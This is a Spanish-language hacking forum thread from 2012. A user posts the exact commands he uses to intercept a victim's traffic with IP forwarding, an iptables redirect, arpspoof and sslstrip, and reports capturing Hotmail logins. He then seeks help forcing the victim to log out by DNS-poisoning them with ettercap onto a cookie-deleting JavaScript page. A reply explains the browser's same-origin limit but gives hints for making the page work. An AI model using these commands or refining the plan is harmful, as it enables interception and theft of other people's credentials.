elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ¿como borrar cookies con codigo en java?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿como borrar cookies con codigo en java?  (Leído 6,759 veces)
thedevilini

Desconectado Desconectado

Mensajes: 52


Ver Perfil
¿como borrar cookies con codigo en java?
« en: 27 Enero 2012, 07:12 am »

Hola a todos, uso backtrack 5 y sslstrip para monitorizar las conexiones SSL de la siguiente manera:

Código:
Código
  1. echo 1 > /proc/sys/net/ipv4/ip_forward
  2. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  3. arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
  4. python sslstrip.py -l 8080

Después miro el archivo.log de sslstrip y listo ahí aparecen los usuarios y contraseñas, pero con un problema. Aparecen, si no tiene iniciada la sesión en la página. Si ya ha iniciado la sesión me aparecen caracteres raros de "id" (secuencia de números).

¿Como puedo obligarle a cerrar la sesión para que tenga que logearse de nuevo?

he leido que se hace redireccionando a la victima a una pagina con un script...

asi que encontre un codigo para borrar las cookies (asi se le cerrara la sesion a la victima)... el codigo es el siguiente:




<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">

//Código en javascript que me elimina las cookies

<body >
 <script language="javascript" type="text/javascript">
 if (document.cookie != "") {
 if (confirm("Eliminar todas las Cookies?")) {
 la_cookie = document.cookie.split("; ")
 fecha_fin = new Date
 fecha_fin.setDate(fecha_fin.getDate()-1)
 for (i=0; i<la_cookie.length; i++) {
 mi_cookie = la_cookie.split("=")[0]
 document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
 }
 document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
 }
 }
 </script>
 </body>


pero no tengo ni idea con que extension guardarlo dentro de mi servidor apache... tampoco tengo idea si es un codigo en php, html o java  :S   ...    y despues de redireccionar a la pagina con el codigo que borra las cookies, ¿como puedo volver a redireccionar a la victima a la pagina de hotmail?  ... muchas gracias espero su orientacion...


« Última modificación: 27 Enero 2012, 07:17 am por Leo Gutiérrez. » En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: ¿como borrar cookies con codigo en java?
« Respuesta #1 en: 27 Enero 2012, 07:27 am »

Este código NO es java. Es javascript, Y HAY DIFERENCIA.

javascript, se ejecuta mediante un motor incrustado en el navegador. Por tanto, se aplica la seguridad del navegador.

Eso quiere decir, simplemente, que no podrás borrar las cookies de otra pagina (otro dominio), que no sea la tuya.
De este modo, si quieres borrar las cookies de hotmail.com, tu pagina tendrá que estar alojada en hotmail.com

El archivo, puede ser guardado en un documento .html

Saludos


En línea

thedevilini

Desconectado Desconectado

Mensajes: 52


Ver Perfil
Re: ¿como borrar cookies con codigo en java?
« Respuesta #2 en: 27 Enero 2012, 10:34 am »

Muchas gracias, es de gran ayuda la info, pero no será necesario
Que este alojado en hotmail puesto que realizare un envenenamiento
Dns con ettercap para rediréccionar a la víctima a la pág. Con
El código, ahora como hago para que desPues la página vuelva a
Rediréccionar a hotmail???  ...  Además quiero informar que
Me esta fallando algo  por que guardo este codigo en un servidor
Apache con la extensión HTML y no surte ningún efecto en las cookies
de la víctima... Que es lo q me esta fallando ??? Saludos
En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.850



Ver Perfil WWW
Re: ¿como borrar cookies con codigo en java?
« Respuesta #3 en: 27 Enero 2012, 10:42 am »

Deberías aprender algo de html y javascript antes de preguntar.. son cosas básicas que en 5 minutos entenderás..

Mira te doy 2 pistas.

1. Para redireccionar a hotmail, es tan fácil como poner en el meta la dirección de hotmail y no que vuelva hacia atrás.

2. Te has fijado en el código javascript ? Te has fijado en que pide confirmación ?


Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Borrar cookies ie 7 « 1 2 »
Programación Visual Basic
rubeng 15 5,666 Último mensaje 27 Julio 2007, 06:18 am
por WHK
Borrar Cookies remotamente ?¿?¿
Programación Visual Basic
locot3 5 4,164 Último mensaje 5 Junio 2009, 18:58 pm
por locot3
Borrar las cookies de session en un WEBBROWSER1 ,COMO?
.NET (C#, VB.NET, ASP)
anikillador 3 6,321 Último mensaje 30 Noviembre 2010, 20:38 pm
por .:Weeds:.
¿como borrar cookies o historial del Xampp?
Desarrollo Web
Angel Zero 0 3,529 Último mensaje 7 Noviembre 2011, 21:35 pm
por Angel Zero
Cómo borrar las cookies automáticamente al cerrar las pestañas del navegador
Noticias
wolfbcn 0 1,460 Último mensaje 16 Mayo 2017, 21:35 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines